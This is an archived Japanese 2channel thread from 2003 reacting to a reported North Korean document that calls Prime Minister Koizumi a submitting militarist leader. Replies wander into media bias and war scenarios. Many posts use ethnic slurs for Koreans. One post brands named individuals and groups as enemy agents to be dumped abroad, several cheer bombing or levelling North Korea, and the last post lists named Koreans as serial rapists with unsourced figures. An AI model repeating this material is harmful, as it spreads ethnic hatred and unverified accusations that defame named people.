2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【政治】「日本軍国主義の頭目が屈服」…小泉首相訪朝で金総書記語る

1 :☆ばぐ太☆φ ★:03/05/12 17:08 ID:???
★日本軍国主義の頭目が屈服=小泉首相訪朝で金総書記語る−北朝鮮文書

・昨年9月の小泉純一郎首相の訪朝について、北朝鮮の金正日労働党総書記が
 「朝鮮敵視政策に執ようにしがみついてきた日本軍国主義の頭目が頭を垂れて
 訪ねてきた」と語ったと内部で説明されていたことが、12日までに明らかになった。

 時事通信が入手した朝鮮人民軍出版社発行の軍幹部用「講演資料」に引用された
 もので、ソウルの外交筋も「文書は間違いなく本物だ」と確認した。

 http://headlines.yahoo.co.jp/hl?a=20030512-00000443-jij-int

2 :_:03/05/12 17:09 ID:VLTfkFvZ
2get

3 :名無しさん@お腹いっぱい。:03/05/12 17:11 ID:w4NwG15/


4 :名無しさん@お腹いっぱい。:03/05/12 17:12 ID:IJQGkr5V
4

5 :名無しさん@お腹いっぱい。:03/05/12 17:12 ID:P1w0qtCm
今だに軍国主義だとか言ってる時代錯誤チュンは放置で・・・

6 :名無しさん@お腹いっぱい。:03/05/12 17:15 ID:ciVuWqpP
       ∧_∧  ∧_∧  ∧_∧  ∧_∧
      ( ゚,_ゝ゚) ( ゚,_ゝ゚) ( ゚,_ゝ゚) ( ゚,_ゝ゚)
     ∧_∧ ) ∧_∧ )∧_∧ )∧_∧ )
    ( ゚,_ゝ゚)  ( ゚,_ゝ゚) ( ゚,_ゝ゚) ( ゚,_ゝ゚)
   ∧_∧ ) ∧_∧ )∧_∧ )∧_∧ )
   ( ゚,_ゝ゚)  ( ゚,_ゝ゚)  ( ゚,_ゝ゚) ( ゚,_ゝ゚)/|
  (____)  (____) (____) (____)
/   ./|./   /|./   /|./   ,/|
| ̄ ̄ ̄|/| ̄ ̄ ̄|/| ̄ ̄ ̄|/| ̄ ̄ ̄|/|
||' ̄ ̄ ||  ||' ̄ ̄ ||  ||' ̄ ̄ ||  ||' ̄ ̄ ||

7 :名無しさん@お腹いっぱい。:03/05/12 17:16 ID:tRp+IWnM
頭目って・・・

8 :名無しさん@お腹いっぱい。:03/05/12 17:18 ID:Vcyk2xfo
( ゚Д゚)ポカーン・・・
まぁ、言いたいこと言わせてれば良いさ( ´,_ゝ`)プッ

9 :名無しさん@お腹いっぱい。:03/05/12 17:20 ID:LiLCbW3h
あいかわらずいいネタ振ってくれるぜ

10 :名無しさん@お腹いっぱい。:03/05/12 17:23 ID:bl5QUgM1
会談前からこうなると思ってました

11 :名無しさん@お腹いっぱい。:03/05/12 17:38 ID:BAGA4Zf7
もう北朝鮮は戦争で負ける気でいるのだろうか。

12 :名無しさん@お腹いっぱい。:03/05/12 17:42 ID:IDA8eBNw
とりあえず官邸にちくっとくか。
ttp://www.kantei.go.jp/

13 :名無しさん@お腹いっぱい。:03/05/12 17:44 ID:YfaSw1ew
あいかわらず楽しいこといってくれるじゃないの。

14 :名無しさん@お腹いっぱい。:03/05/12 17:44 ID:tYqS0FlP
ラムズフェルトちゃん、出番ですよ!

15 :名無しさん@お腹いっぱい。:03/05/12 17:45 ID:59sPfl8w
てか、ソウルの外交筋ってのもアホだろ。
こんなバカの北チョン相手にすんじゃねーよ。



16 : :03/05/12 17:54 ID:piYUNto3
テレ東要略

被害者のシャラス氏
・全治3〜6ヶ月。まだエジプトに帰れない
「戦場から爆弾をお土産に持ち帰るヤツなんかいるものか」
「毎日新聞の対応は誠意がない」
「毎日の社長は見舞いにきたが、忙しいからと2分で帰った」
「私の体調を聞くこともなかった」
「告訴を取り下げるよう金額を提示された。屈辱だ」
「五味を投獄させたい、裁判に1万〜2万ドル掛かってもいい」
「ゴミは記者を辞めるべきだ」

毎日新聞
「個別の金額については公表できない」とのこと

テレビ東京
「ヨルダン人被害者へのインタビューはヨルダン当局によって禁止されている」
「シャラスさんはエジプト人のためインタビューが可能となりました」


17 :名無しさん@お腹いっぱい。:03/05/12 18:01 ID:X58nQEcY
>>16
マジですか?

18 :_ ◆R29znUllPo :03/05/12 18:08 ID:a8N5BQSk
まぁ、あの会談で小泉は笑顔は一度も出さなかったし、ましてや頭を下げることなど全く無かったと聞いているが。
北朝鮮内部向けの説明にいちいち目くじらを立てる必要はありませんなぁ。

19 :名無しさん@お腹いっぱい。:03/05/12 18:11 ID:nRZ2kyzW
強気一本でいかなきゃ独裁を維持できないんでしょう。
虚像の世界に浸ってるのかな? ジョンイルは。
政治こそ究極の実像なのにね。

20 :名無しさん@お腹いっぱい。:03/05/12 18:12 ID:OKZ8pn37
もはや異次元空間だな。

21 :名無しさん@お腹いっぱい。:03/05/12 18:16 ID:DeR8IS7W
>>17
マジです。5時ごろの放送でした。
TV東京のニュースって、
サイトにWMVファイルUPしてたりしませんか?

22 :名無しさん@お腹いっぱい。:03/05/12 18:18 ID:L4eWmGj3
やってくれる(・∀・)!!!

23 :名無しさん@お腹いっぱい。:03/05/12 18:19 ID:GF8PDZWP
乞食は放置に限る

24 :名無しさん@お腹いっぱい。:03/05/12 18:20 ID:OCN5gzDs
金ジョン犬はドッグフードの食べ過ぎ

25 :名無しさん@お腹いっぱい。:03/05/12 18:24 ID:wLuTJjHv
でも、あんな平壌宣言署名するくらいだから、
遠からずともいえなくも無い。

26 :名無しさん@お腹いっぱい。:03/05/12 18:28 ID:bl5QUgM1
>>16
俺も見た。毎日新聞が組織的に被害者を買収しようと画策している実態が
はっきりしたな。毎日腐り切ってるわ

27 :名無しさん@お腹いっぱい。:03/05/12 18:30 ID:3muvqamG
>>16
結局、金で解決か。汚いね

28 :名無しさん@お腹いっぱい。:03/05/12 18:42 ID:joyFecXT
(/_-;)

29 :名無しさん@お腹いっぱい。:03/05/12 18:51 ID:BgnRvLq1
>>16
これってさあ。
産経あたりが記事にしてくれないかなあ。
このまま埋もれさせておいて良いことか?
ほとんどの人は気づかないんじゃないの?

30 :名無しさん@餓死寸前:03/05/12 18:57 ID:ZTeNUiZK
北朝鮮が新たに燃料投下!?
でもしけってるぞ、この燃料。
もっと往時の電波ぶりを見せてくれよ(・∀・)ニヤニヤ

31 :名無しさん@お腹いっぱい。:03/05/12 18:58 ID:9dNkhEBG
もうだめぽ

32 :名無しさん@お腹いっぱい。:03/05/12 18:58 ID:i8/k9U7R
テロ新聞らしい対応だな
とんでもなく日本に迷惑かけてんなキチガイ新聞社


33 :名無しさん@お腹いっぱい。:03/05/12 19:02 ID:G6Z6urZW
>>32
ソンちゃんのヤフーだモンね!

34 :名無しさん@お腹いっぱい。:03/05/12 19:02 ID:pWXpsoi4
だからあれほど言ったのに…。
今交渉してるアメリカの外交官も同じ事言われてるんだろうな。

35 :名無しさん@お腹いっぱい。:03/05/12 19:02 ID:D9LbXPlq
>>16
なんでここに?完全に板違いなんだけど

36 :名無しさん@お腹いっぱい。:03/05/12 19:05 ID:T1wehFj9
http://www.home-country.com/
http://61.115.1.12/bigin/index.html

37 :名無しさん@お腹いっぱい。:03/05/12 19:06 ID:5PEJBav3
 怒りを爆発させてもバチは当たらないよ。 事実上の宣戦布告
と見なす、とこちらから逆宣言せよ。
 そういうふざけた言い方を改めなければ、事態は深刻になる。
と言えばいい。これはもう黙っている必要はない。
 どうせ攻撃はできないのだから、こちらもブラフかましたれ。


38 :名無しさん@お腹いっぱい。:03/05/12 19:10 ID:G6Z6urZW
>>37
吹けば飛ぶような折れ達はともかく、安部タン等がいきり立っても
へっぴり腰な日本政府は何もしてくれない…。・゚・(ノД`)・゚・。

39 :名無しさん@お腹いっぱい。:03/05/12 19:11 ID:5sEatH5E
金は拉致問題で自分が謝ったことや、カネを無心してることは
部下には黙ってるんだね。
恥ずかしいから知られたくないみたいだね。

40 :名無しさん@お腹いっぱい。:03/05/12 19:12 ID:pVJepML4
また、北朝鮮が燃料注入してくれたのか? ありがたい事ですね。


41 :名無しさん@お腹いっぱい。:03/05/12 19:13 ID:oPU4lMAN
金大中が来たときのコメントが知りたい。

42 :名無しさん@お腹いっぱい。:03/05/12 19:17 ID:5PEJBav3
>>38
マスコミもヘタレだからな。

43 :MR・M・E:03/05/12 19:29 ID:I1l5yEqP




日本は終わりなんだ

44 :名無しさん@お腹いっぱい。:03/05/12 19:31 ID:TEaBkyp6
経済支援が日韓参加の条件 北朝鮮、3カ国協議で

【北京12日共同】朝鮮民主主義人民共和国(北朝鮮)が4月下旬の北京での米朝中3カ国協議で、
 米国が求めた日本や韓国の協議参加について、日韓両国による経済支援の実現を事実上の
 参加条件にしていたことが分かった。
 米朝協議筋が12日までに明らかにした。
 北朝鮮は同協議で米国に核問題解決を含む米朝関係正常化に向けた「新しく寛大な提案」(北朝鮮外務省談話)をし、
 核開発放棄の条件として日韓の経済協力、資金提供の実施を保証するよう米国に求めたことが分かっている。
 日韓の協議参加条件としても経済支援を取り上げたことは、日本人拉致事件でこう着状態になっている日朝国交正常化交渉と
 切り離す形で、早期に経済支援を得ようとする思惑がありそうだ。
 日本は核問題や拉致事件などの懸案が解決した後に国交正常化、経済支援が可能との立場で一貫しており、
3カ国協議参加を優先させて経済支援に踏み切るのは難しい状況にある。(共同通信)

金正日は本当にアホだねえ。

45 :名無しさん@お腹いっぱい。:03/05/12 19:37 ID:ZMBKsuwl
NHKの調べによると軍事的圧力による制裁に賛成13%だった
経済制裁賛成と合わせると60%超えたみたいだよ
日本の世論は変わった

46 :名無しさん@お腹いっぱい。:03/05/12 19:38 ID:juNrNDWH
金ちゃんの情報源は、FOXに負けたCNNとか最近偏向しているNHKだからね。
もう周りが見えなくなるほどアホなのは仕方がない。


47 :チョンコホイホイ :03/05/12 19:40 ID:AeKZxNwr
>>43
チョンは終わりなんだ
http://stick.newsplus.jp/id.cgi?bbs=news4plus&word=I1l5yEqP
在日である MR・M・E 大鵬健太 ゴキブリを超える
日本人である MR.M.E.殿 正義の人
http://v-v.2ch.net/test/read.cgi/news4plus/1052639561/53
ID:tichA/iy 工作員とみなす
(鮮人ホイホイ)
 大鵬健太、ID:tichA/iy
 総連、民団
 社民、共産、朝日、毎日、売国害無省、吉田康彦、日教祖、大江健三郎、小田実、小田、辛淑玉(シンスゴ) 、野中
 「核兵器廃絶をめざすヒロシマの会」(森滝春子共同代表)、他反核・反戦団体
     半島に正当投棄

     お土産は、核廃棄物以外何がいい??害になる物


因みに在日である MR・M・EのHp
大鳥三兄弟の輝く朝鮮
http://www.geocities.co.jp/WallStreet/6469/

BBS
http://bbs2.otd.co.jp/282765/bbs_plain

チョン悪行リストに投稿しよう
http://f12.aaacafe.ne.jp/~hiromima/index.html


48 :名無しさん@お腹いっぱい。:03/05/12 19:42 ID:ZMBKsuwl
>金ちゃんの情報源は、FOXに負けたCNNとか最近偏向しているNHKだからね。

だとしたら真っ青になるぞw
制裁賛成が6割なんだから>NHK調べ

49 :名無しさん@お腹いっぱい。:03/05/12 19:46 ID:i8/k9U7R
>>45

俺も見た
でもNHKの円グラフチョット変だったけど
一番多い結果の経済制裁が一番目立つ表記というか時計で言う12時のところから表記されるのが
通例だと思っていたけど、2番目の対話がそのように表記されていた
なんか説明するの難しいけどw
画像キャプでも有れば分かり易いんだがw

50 :名無しさん@お腹いっぱい。:03/05/12 19:48 ID:uSMpHgY+

さすが世界最狂のデムパ大国の首領。

言うことが違うなぁ。


51 :名無しさん@お腹いっぱい。:03/05/12 20:00 ID:ehqj6GlM
      /|
    /  ノ \´|
   / #  O  ヽ
   |   /ヽ O| |
  /    ヽ, /   /   |      ヽ /
  |    ∧   ヽ
   ̄ ̄ ̄   ̄ ̄\
   馬 鹿 か?   |

52 :日本:03/05/12 20:00 ID:IkNF9MwP
俺らの国では稲穂が頭を垂れるんだが(w

53 :長くてスマソ:03/05/12 20:01 ID:sIosJI6N
>>29
今日の産経の31ページ目「モラル 少年犯罪 ハザード」での川崎万引少年のネタ
帝京の土本武志教授の通報行為はほめられること、という意見の次に↓の文が…

 一方、報道番組を手が
けるテレビプロデューサ
ーの吉永春子さんは「日
ごろから万引が多く、店
側がうんざりしているの
は分かる。でも、子供は
万引に興味を持つもの。←←←!?!?!?!?!?!?!?!?
警察を呼ばず、再犯させ
ないよう粘り強く説得す
るぐらいの気持ちが店側
には必要だった」と少年
育成の大切さを指摘して
いる。

晒し上げという意味で産経は載せたんでしょうね。名前入りだし。

54 :名無しさん@お腹いっぱい。:03/05/12 20:02 ID:4MhK531I
内弁慶

55 :名無しさん@お腹いっぱい。:03/05/12 20:05 ID:r+Vzr4nR
大日本帝国軍国主義の棟梁が朝鮮民主主義人民共和国に土下座して謝罪と賠償を
する為にやって来た。

56 :名無しさん@お腹いっぱい。:03/05/12 20:36 ID:ag9NrGw/
>>49
あんたと同じ疑問、俺も思った。

1番目に「対話重視」が挙げられ、これが40%『前半』
2番目が「経済制裁容認」これが40%『後半』
3番目が「軍事的手段を含んだ〜」で13%

2+3で60%越えてるんならば、1より2の方が多くなければ
(先にグラフに出なければ)おかしいな?と

まぁ『〇か×か』の二者択一で、強硬論が上回ったんだから
その事実は受け取るにしても、ちょっとあのグラフ表示は
作為的かな〜?と後から感じる事しきり。

57 :名無しさん@お腹いっぱい。:03/05/12 20:38 ID:r+Vzr4nR
>>56
経済制裁容認が最も多く、これに軍事制裁容認を加えると60%近く行きそう
でしたね。これが日本人の本音ですね。

いくらマスゴミが誤魔化そうとしても、もう日本国民の意志は決まりつつあるね。

58 :56:03/05/12 20:48 ID:Y8p/FdeJ
スマヌ
俺のとっちらかった説明だと、100%越えちまうw
>>57氏の通り【現状より厳しく】って過半数の意見が出た事は
日本は正しい選択肢を導き出しつつある。って事ですわ。

59 :名無しさん@お腹いっぱい。:03/05/12 20:51 ID:faYi8cjj
>>57
「対話重視」=「制裁反対」

という訳でもないだろうな、微妙な選択。

60 :名無しさん@お腹いっぱい。:03/05/12 21:01 ID:i8/k9U7R
>>56
>作為的かな〜?と後から感じる事しきり。

やっぱり同じ事考えていた人いたんだね
普通、円グラフの場合、一番多い結果が時計で言う12時を基点にして
時計回りに表記するってのが一般常識だよね
たしか小学校のグラフの授業でもそのように習った

それを考えると2番目の対話が12時の基点から表記されるなんてのは
変な意図を感じる
明らかに不自然
一見すると対話が一番多いみたいな錯覚を起こしますからな
まああの局も最近おかしいからね

61 :名無しさん@お腹いっぱい。:03/05/12 21:03 ID:r+Vzr4nR
>>60
さっき、”小泉首相不支持35%、前回より低下”と。

・・普通、支持率を出すでしょ。ヲカシイ。

62 :名無しさん@お腹いっぱい。:03/05/12 21:06 ID:i8/k9U7R
>>61
支持率アップって言い方でなく不支持率低下ですか
ヤバイなNHK

63 :名無しさん@お腹いっぱい。:03/05/12 21:10 ID:8IBVSxDE
経済制裁も良いけれど、

38年間以上の大日本帝国の栄衰を知ってる朝戦人としては2年以内に暴発ですな。
やはり核を手にしてるとなると後には引かないでしょう。そうするとノドンが能登半島の先に
落ちたその軌跡の先・・・つまり東京ってゆう事になるんでしょうか?
あまり精度良さそうでは無いが、結構ミサイル基地はアチコチあるみたい。700発以上は
ミサイル持ってる模様。先の大戦でドイツのV2でも結構イギリス本土に命中してた
見たいだし、いくら北でもそれよりはましでしょう。核であれ、無しであれ3発も日本に
届けばパニック状態でしょう。
ちゃんとそのくらいシュミレーションしてる人(団体)はいるんでしょうか?
ただ事が起きてから、蜂の巣突っついた状態になるのだけはいやです。そのくらい
覚悟してるんでしょうか、皆さん。無傷は虫が良すぎますよ。



64 :名無しさん@お腹いっぱい。:03/05/12 21:10 ID:r+Vzr4nR
>>62
そんなNHKには視聴率払いたくない。
広告料、自分でとって民放と同じにして欲しい。

65 :名無しさん@お腹いっぱい。:03/05/12 21:12 ID:r+Vzr4nR
>>63
まぁ、ノドンなんて飛ばんからねぇ。
焦って脅そうとして発射したシルクワームが失敗する有様で、笑わせちゃうよね。
今、恫喝したい時期なんだから、ノドンを幾つか日本海に向けて撃って、
その力を誇示すべきでしょ。
でも、それすら出来ないのが今の北朝鮮の実力なの。

66 :名無しさん@お腹いっぱい。:03/05/12 21:13 ID:bl5QUgM1
>>64
NHKはクズだが民放よりはマシ。

67 :名無しさん@お腹いっぱい。:03/05/12 21:15 ID:VoCmDfD7
民放の最後の良心?
TVタックルは今日も激しいよ

68 :名無しさん@お腹いっぱい。:03/05/12 21:18 ID:+d+eVBPd
あのさ〜。
北に攻め込む理由なんて何とでもなるじゃん。
現行の憲法下でも問題ない理由があるんだから、
ちゃっちゃっちゃっと、やろーよ。


69 :名無しさん@お腹いっぱい。:03/05/12 21:20 ID:tRp+IWnM
数少ない核を日本に打ち込んだら、

正日は何を盾にするの?

70 :名無しさん@お腹いっぱい。:03/05/12 21:22 ID:n8RFTIIZ
>>69
北朝鮮人民。
「ボクをいじめたら、自国民を殺しちゃうから。」
まあ、既に殺しているわけだが。w

71 :名無しさん@お腹いっぱい。:03/05/12 21:24 ID:r+Vzr4nR
>>68
もうちょっと締め上げてからでもいいか?
在韓米軍が準備が出来るまで我慢。

72 : :03/05/12 21:27 ID:V6K6H5XX
朝鮮人は朝鮮人同士。朝鮮戦争が最良の選択。

73 :名無しさん@お腹いっぱい。:03/05/12 21:28 ID:AbZGa9he
>>63
少なくともお前より知識のある人がさまざまな状況を想定して作戦は練ってるよ。
まあミサイル一発ぐらいは刺激としていいと思うがな。

74 :名無しさん@お腹いっぱい。:03/05/12 21:28 ID:IqcX1AKz
映像にある小泉首相と金豚が握手すると、周囲から拍手が沸き起こるヤツ。
あれって、拉致被害者の死亡のウソが日本側に伝わっていたため、強硬派安倍副官房も
いたりして、日本側からは誰一人拍手しなかったそうだけど。
周りにおべんちゃらばかりいる金豚にしたら、そりゃさぞかしショックだったろうな。ヨイショな香具師
ばかりとしか話さないから、ニコリともしない小泉さんや、拍手しない日本人は、金豚にとってはどんな
言葉よりも「手強い日本」を知らしむるものだったろう。
流石にこのご時世だ。多分、国民もうすうすながら、凡その見当はしているはずだ。
体制側に都合の良い記事は、ちゃんと差引勘定して読んでるよ。気に死なさんな。

大切なことは、今までのように「腰砕け」にならずに、基本原則を徹底して押し通すことだ。
敵は外務省な。国民の皆さん、横田さん夫妻を見てて、外務省の根性見抜こうね。


75 :名無しさん@お腹いっぱい。:03/05/12 21:32 ID:r+Vzr4nR
>>74
外交は武器を使わない戦争だそうだけど、日本の外務省はとてもそんな
存在に見えない。過去の実績といえばムネオのパシリだけ。ダメポ。

76 :名無しさん@お腹いっぱい。:03/05/12 21:38 ID:Z1c4WBfc
>>75
それどころか「太平洋戦争の反省・情報の一元化」を目指して
各省から上がる現場の情報を無理矢理統合。いちいちケチをつけ
時に、自分の都合の悪い情報は捻じ曲げ捏造して官邸に報告するんだから
(ルワンダPKO、日朝平壌宣言なんか、その最たるモノ)

これも”とっとと叩くべき対象”だと思うべき

77 :名無しさん@お腹いっぱい。:03/05/12 21:49 ID:hNHBf1Ux
>>74
同意。小泉純ちゃんには批判も多いけど、ひとつだけ誉めるべきところが
あると思う。それは「平壌に行って、金豚に笑顔を売らなかった唯一の
日本人政治家」ってところだ。

78 ::03/05/12 21:52 ID:IkNF9MwP
>>69
ジャミーラ・常岡・村岸に決まってんだろが!!ボケ!!

79 :名無しさん@お腹いっぱい。:03/05/12 22:09 ID:r+Vzr4nR
>>78
ジャミーラ、人間の盾を募っておいて、攻撃が始まる前に日本へ戻ってたね。

そして、”バグダッドに残っている人が心配”とか言ってタ。

・・ヲイヲイ、だよなぁ。

80 :名無しさん@お腹いっぱい。:03/05/12 22:21 ID:EaHxaOp3
どうしてチョンはこうも重ね重ねバカ揃いなのか

81 :   :03/05/12 22:31 ID:2xKTUTXY
親父の金日成も金丸が来たときに、国内向けには同じことを
言っていたんだろ。
それとか、アフリカの極貧国の独裁者を多数集めてきて、ほら世界は
首領様を尊敬してるとかね。 普通の国は相手にしてくれないから。

個人崇拝好きの独裁者親子だから同じ手を使って、個人崇拝固めしてんだよ。

82 :名無しさん@お腹いっぱい。:03/05/12 22:39 ID:Nr/Reqj8
日本の官僚は国益より省益を優先する。


83 :名無しさん@お腹いっぱい。:03/05/12 22:40 ID:+3rhXIHU

軍国主義は中国の方だと思うのだが



84 :名無しさん@お腹いっぱい。:03/05/12 22:57 ID:cl7q2lB6
ラムズフェルドに北を更地にしてもらうゼ!

ついでに南もヤッテクレルと尚良い!


85 :名無しさん@お腹いっぱい。:03/05/12 23:12 ID:lNquDSuO
朝鮮民主主義共和国の金正日国防委員長は

飢えた数百万の民をよそに暴飲暴食で糖尿病を患い、
肉欲に溺れ、惨めにも権力にしがみつくしか能がない


物 乞 い で あ る こ と を 確 認 す る 


という国連決議でも出してほしい。

身の程を知れ、豚野郎。

86 :名無しさん@お腹いっぱい。:03/05/12 23:29 ID:AA45qyWQ
ここはスレ違いのレスが多いスレですね

87 : :03/05/12 23:46 ID:JbwSZN65
小泉首相に金正日が初めて対面した際、わざと朝鮮語で、聞くに堪えない暴言を吐いたと聞いた。
情報キボーン

88 :名無しさん@お腹いっぱい。:03/05/12 23:48 ID:AbZGa9he
>>86
ネタスレですから

89 :名無しさん@お腹いっぱい。:03/05/13 00:20 ID:nw+MsQjf
>>87
「おーこれが小泉かー」だとさw
ちなみに日本のメディアはろくに報道しなかった

90 :名無しさん@お腹いっぱい。:03/05/13 00:23 ID:Nta4sJEn
初耳だね

暴言吐くなら堂々と言え乞食犯罪者チョソ野郎w

91 :名無しさん@お腹いっぱい。:03/05/13 00:31 ID:kL5BM/Pi
…思うんだが
生粋の日本人wで朝鮮語話せる奴ってどれくらいいるんだ?

日朝会談以降、マスコミの奴が流暢な朝鮮語で取材してるのは
たまーに見かけるが、所詮奴らは在日採用枠・生粋の朝鮮人だろ?

外務省とか警察の外事課とか、ハングル専攻した人をちゃんと押さえてるのかな?
まさかとは思うが、、、どうなんだろう?

92 :名無しさん@お腹いっぱい。:03/05/13 00:33 ID:lTzz2Chy
>>89
 そのくらいは、北韓・南朝鮮問わず半島人のデフォルト。
「日本人は全員、チョッパリという言葉の意味知ってるよ」と言ったら
たいていの半島人は、真っ青になり、一部は逆切れするそうな。


93 : :03/05/13 00:41 ID:J5DLur4S
こんな国と国交回復した日本に何かいい事ってあるんだろうか?
1.松茸が安く手に入りやすくなる。
2.キーセン旅行が格安できる。
3.・・・・・

94 ::03/05/13 00:41 ID:PYLAiHid
>>43 のMR.M.E.はニセモノです。
こいつは大鵬健太です。

大鵬健太bbs
http://bbs2.otd.co.jp/282765/bbs_plain

こちらのHPも、ぜひ御覧ください。大鵬健太の悪行を晒しています。
「在日の掲示板を楽しむホームページ」
http://zainichi.fc2web.com/index.html

95 : :03/05/13 00:42 ID:0Zf0RTzK
今日はこのぐらいにしといたる!!

96 :名無しさん@お腹いっぱい。:03/05/13 00:49 ID:1RxuJ2p9
面白すぎるね北朝鮮。
これ世界に知れたらほんと笑い者なだけにギャグで終わることを祈るよ

97 :名無しさん@お腹いっぱい。:03/05/13 01:04 ID:FgWOfe54
鮮人らしい発言だ!!身の程知らずにも程度というものがある。(w
まあ、こっちが本格的な経済制裁を施行した時点で、ヤツは終わりなんだが
・・・。


98 :名無しさん@お腹いっぱい。:03/05/13 01:05 ID:Nta4sJEn
>>93
松茸って言っても日本産とは比べられない程劣るしね

それに北朝鮮レベルの松茸なら人口栽培に目処が立ったとかって
どっかの新聞に掲載されたような


99 :名無しさん@お腹いっぱい。:03/05/13 02:10 ID:e92hRMWY
この際だから北朝鮮はアメリカとどっちが本当に強いのかを
はっきり見せてもらいたい。

後が面倒だから国民の最後の最後の一人までアメリカと差し違えて
ほしいぞ。


100 : :03/05/13 02:31 ID:/BH6sUJ6
NHKの円グラフ表記を叩いてる奴は低学歴か?
穏健〜強行を段階的に表してることぐらい気付けよ。

101 :名無しさん@お腹いっぱい。:03/05/13 02:56 ID:Nta4sJEn
円グラフは
何を優先して表記するか
それが問題だね

思想で分ければそうなるだろうし

ったく低学歴がどうとか
学歴板でやってくれ

102 :名無しさん@お腹いっぱい:03/05/13 03:38 ID:L0sszDY2
イラク戦争反対デモ 有事法制反対デモは北朝鮮の手先の行動と言うのは
本当らしい 日本人拉致ではデモもせず イラク攻撃の反対をしたのは
北が攻撃されたら困るやからがデモをしたのだと いう説がある

103 :名無しさん@お腹いっぱい。:03/05/13 03:40 ID:Nta4sJEn
>>102
説もなにも
俺は今までそう思ってたけどw

そういう連中も北朝鮮がどうにかなったらヤバイ事になるかもね
アメリカは危険分子には容赦無いからな

104 :名無しさん@お腹いっぱい。:03/05/13 04:02 ID:+E4OWOnd
>>102
米海軍空母寄港反対デモとかをやる「平和団体、市民団体」
とかも加えておいて下さい。

あとこの御時世に
「クラスター爆弾」「劣化ウラン弾」「大量殺戮兵器」「大義なき戦争」などの
字句を華々しく使う集団・活字媒体には細心注意が必要です

105 :名無しさん@お腹いっぱい。:03/05/13 05:05 ID:PWu7tKnN
戦争♪おっけーよ♪

106 :名無しさん@3周年:03/05/13 05:12 ID:+S7XN7UB
>>104
反米キャンペーンに利用しようとクラスター爆弾を
持ち帰ろうとして、善良な空港職員を殺傷しちゃった
とんでもない新聞社もありましたね。

107 :名無しさん@お腹いっぱい。:03/05/13 05:22 ID:1XOhLn7S
人間の盾の人たちへ、
イラクの時はご苦労さんです、
ついては、今度は北朝鮮へ行ってもらえませんか。
いつ何時、米軍の攻撃があるかわかりません。
もっと大事な理由は、拉致された人たちの子供たちとの
交換プログラムで、代わりに北に人質として滞在してください。
食料、その他、日常的に必要なものはお送りします。
本当に、全部の日本国民から感謝されますよ。


108 :名無しさん@お腹いっぱい。:03/05/13 06:34 ID:TIPvB0wR
会談の後の小泉や害無症の態度を見てると、本当に小泉は謝りに行ったのかも
知れないな。

109 :名無しさん@お腹いっぱい。:03/05/13 06:43 ID:M9uNJvM2
こいずみだめぽ

110 :名無しさん@お腹いっぱい。:03/05/13 09:50 ID:FS24gL3W
今の日本人のへタレをマジで金は知らないんだろうなぁ。
だいたい北朝鮮軍が攻めてきても「災害」として扱われることになるのに、
日本を「軍国主義」かw
いっそまじで攻め込んでみてはいかがでしょう?>北朝鮮関係者
それでも日本は「軍国主義」にはならないだろう。
日本をどうやったら「軍国主義」に出来るだろうか?今の主導を握っている
政治家たちが在日たちとかなり密接に関わっている事実からも絶対ムリだろう。
自民党会館にすら在日をサポートする団体などが集まっているのだから。
そしてそれらをサポートしているのが旧華族の連中なのだから・・・


111 :名無しさん@お腹いっぱい。:03/05/13 10:28 ID:+8LaJl1w
>>100
だったら強行→穏健でもいんじゃない?
武力+経済制裁で過半数超えているんだったら、むしろそうするべき。

112 :名無しさん@お腹いっぱい。:03/05/13 10:33 ID:6miOwRq3
>104
劣化ウラン弾だけはやっぱりまずいと思う。

113 :名無しさん@お腹いっぱい。:03/05/13 11:15 ID:121mUQII
んー北へ直接に経済制裁するしないとかいうのは微妙な問題があるだろ。

だから、内政である、在日朝鮮人自身への税金&税制、パチンコという賭博
の監視強化をしっかりとやればいいんだよ。

内政問題である以上、北に経済制裁どうこう言われる筋合いのものでもない
からな。
これだけでもキッチリやれば、北は勝手に自己崩壊するよ。

とにかく在日には甘過ぎなんだよ。

114 :名無しさん@お腹いっぱい。:03/05/13 11:34 ID:pgdcE7Ua
基本的人権が どうのこうの言わずに早く有事法通せよ 反対の謝民 京三は 選挙で落とす 外務笑 棚かは 失敗 安部はまし ましなほうを 支持するしかない 今は

115 :名無しさん@お腹いっぱい。:03/05/13 11:46 ID:iVjvENOm
支援米、不正送金、朝銀資金投入

軍国主義の頭目 【野中&チャイナ・スクール】  マンセー

【北の将軍様】に、屈服した 【野中 大元帥閣下】、とことん マンセー ...........

【野中&チャイナスクール&脱北者追い返せ!阿南閣下】 マンセー..................
拉致被害者が、どんなに【 吠えても 】 残された子供は、帰ってこないんだよ! マンセー...........

2ちゃんねらどもが、どんなに『 吠えても 』、 日本国【野中 大元帥閣下】とことん マンセー......
ウェ〜ハッハッハッハッ〜〜〜〜〜〜


116 :名無しさん@お腹いっぱい。:03/05/13 12:53 ID:eJrJruWz
万景峰号に爆弾セットして送り返し


117 :名無しさん@お腹いっぱい。:03/05/13 17:21 ID:gCXkW7pe
毎度毎度飽きもせず、その辺のアホガキみたいなハッタリこきくさって

118 :名無しさん@お腹いっぱい。:03/05/13 17:26 ID:nO5/BJsX
流石は将軍様。
伝説の格闘家ミスター・サタンを思い出し(ry

119 :名無しさん@お腹いっぱい。:03/05/13 18:10 ID:NUZn53UF
さて、北朝鮮への謝罪はすんだわけだがw

120 :名無しさん@お腹いっぱい。:03/05/13 18:14 ID:ctfPRQUz
しかし、こういう小児の「ウンコー!!」レベルの罵倒って、実質的にどこにアピールするんだろ?

普通に疑問だ。

国民はもとより、政府内部もほとんどクーデター寸前じゃないの?

121 :在日の特別永住権排除汁:03/05/13 18:20 ID:JnPnZGhi
●鄭明析 →韓国人の強姦魔 カルト宗教教祖。日本人1000人、台湾人100人レイプ
●李東逸 →韓国人の強姦魔 日本人女優Nを強姦未遂で逮捕
●金允植 →韓国人の強姦魔 大阪、主婦を連続強姦 。 被害者100人以上
●金 大根 →韓国人の強姦魔 連続児童虐待暴行殺人。6名の女児死亡
●李昇一 →韓国人の強姦魔 東京、テレビ局関係者を名乗り少女140人をレイプ
●沈週 一 →韓国人の強姦魔 鳥取、ベランダから女性の部屋へ侵入し9人レイプ
●張今朝 →韓国人の強姦魔 長野、「一緒に猫を探して」と小学校の女児をレイプ
●ぺ・ソンテ →韓国人の強姦魔 横浜、 刃物で脅し、女子小学生14人をレイプ
●金聖鐘 →韓国人の強姦魔 神奈川、レイプ現場をビデオで撮影、バラバラ殺人
●宋治悦 →韓国人の強姦魔 東京、ナイフで脅し主婦19人をレイプ
